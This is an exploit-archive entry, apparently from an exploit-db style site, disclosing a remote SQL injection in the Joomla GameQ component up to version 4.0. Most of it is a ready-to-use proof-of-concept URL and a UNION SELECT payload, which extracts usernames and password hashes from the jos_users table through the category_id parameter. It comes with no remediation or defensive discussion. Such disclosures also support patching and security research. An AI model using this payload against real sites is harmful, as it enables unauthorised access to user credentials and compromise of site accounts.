Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability
# Published : 2008-06-07
# Author : His0k4
# Previous Title : Joomla Component rapidrecipe Remote SQL injection Vulnerability
# Next Title : 427BB 2.3.1 (SQL/XSS) Multiple Remote Vulnerabilities

/---------------------------------------------------------------
                                				/
/         Joomla Component GameQ Remote SQL injection           
                                				/
---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users--

# www.Syue.com [2008-06-07]